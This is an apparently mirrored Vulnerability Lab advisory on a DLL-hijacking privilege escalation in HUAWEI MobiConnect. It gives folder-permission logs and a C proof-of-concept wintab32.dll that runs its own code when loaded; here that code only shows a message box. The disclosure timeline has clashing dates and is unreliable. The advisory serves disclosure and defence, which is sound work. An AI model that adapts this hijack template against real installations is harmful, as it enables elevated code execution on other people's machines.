Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:31978
HistoryMay 05, 2015 - 12:00 a.m.

HUAWEI MobiConnect 23.9.17.216 - Privilege Escalation Vulnerability

2015-05-0500:00:00
vulners.com
17

Document Title:

HUAWEI MobiConnect 23.9.17.216 - Privilege Escalation Vulnerability

References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1389

Release Date:

2015-05-04

Vulnerability Laboratory ID (VL-ID):

1389

Common Vulnerability Scoring System:

6.7

Product & Service Introduction:

Wherever you are, our offer Mobiconnect allows you to work with the same comfort that company for your laptop.
You can, in complete freedom … Surfing the Internet, Consult your mail and all your attachments, Access your
documents and business applications. In addition to GPRS / EDGE unlimited, you can send free SMS to the Mobilis
network on your computer.

(Copy of the Vendor Homepage: http://www.mobilis.dz/entreprises/mobiconnect.php )

Abstract Advisory Information:

An independent vulnerability researcher discovered a local privilege escalation vulnerability in the official HUAWEI MobiConnect 23.009.17.00.216 software.

Vulnerability Disclosure Timeline:

2014-00-00: Researcher Notification & Coordination (Hadji Samir)
2014-12-23: Vendor Notification (PSIRT Team)
2014-12-26: Vendor Response/Feedback (PSIRT Team)
2014-04-17: Vendor Fix/Patch (HUAWEI Developer Team)
2014-05-04: Public Disclosure (Vulnerability Laboratory)

Discovery Status:

Published

Affected Product(s):

HUAWEI
Product: MobiConnect HUAWEI 23.009.17.00.216

Exploitation Technique:

Local

Severity Level:

High

Technical Details & Description:

A local privilege escalation vulnerability has been discovered in the official HUAWEI MobiConnect 23.009.17.00.216 software.
The local security vulnerability allows an attackers to gain higher access privileges by execution of arbitrary codes in connection with dll hijacking.

The security risk of the local privilege escalation vulnerability is estimated as high with a cvss (common vulnerability scoring system)
count of 6.7. Exploitation of the vulnerability requires a local privileged systen user account without user for interaction.
Successful exploitation of the privilege escalation web vulnerability results in software- or system compromise.

Proof of Concept (PoC):

The local vulnerability can be exploited by local attackers with restricted system privileges and without user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

— PoC Session Logs [Insecure Permissions Local Privilege Escalation] —
C:\Program Files>cacls "MobiConnect"
C:\Program Files\MobiConnect BUILTIN\Utilisateurs:(OI)(IO)F
BUILTIN\Utilisateurs:(CI)F
NT SERVICE\TrustedInstaller:(ID)F
NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
AUTORITE NT\Systeme:(ID)F
AUTORITE NT\Systeme:(OI)(CI)(IO)(ID)F
BUILTIN\Administrateurs:(ID)F
BUILTIN\Administrateurs:(OI)(CI)(IO)(ID)F
CREATEUR PROPRIETAIRE:(OI)(CI)(IO)(ID)F
C:\Program Files\MobiConnect>cacls "MobiConnect.exe"
C:\Program Files\MobiConnect\MobiConnect.exe BUILTIN\Utilisateurs:F
AUTORITE NT\Systeme:(ID)F
BUILTIN\Administrateurs:(ID)F

— PoC Session Logs [DLL Hijacking Exploit (wintab32.dll)] —
*/

#include <windows.h>

BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
owned();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

int owned() {
MessageBox(0, "MobiConnect DLL Hijacked\Hadji Samir", "POC", MB_OK);
}

Security Risk:

The security risk of the local privilege escalation vulnerability in connection with the dll hijacking bug is estimated as high. (CVSS 6.7)

Credits & Authors:

Hadji Samir [email protected]

Disclaimer & Information:

The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: [email protected] - [email protected] - [email protected]
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
([email protected] or [email protected]) to get a permission.

			Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

– VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: [email protected] PGP KEY: http://www.vulnerability-lab.com/keys/[email protected]&#37;280x198E9928&#37;29.txt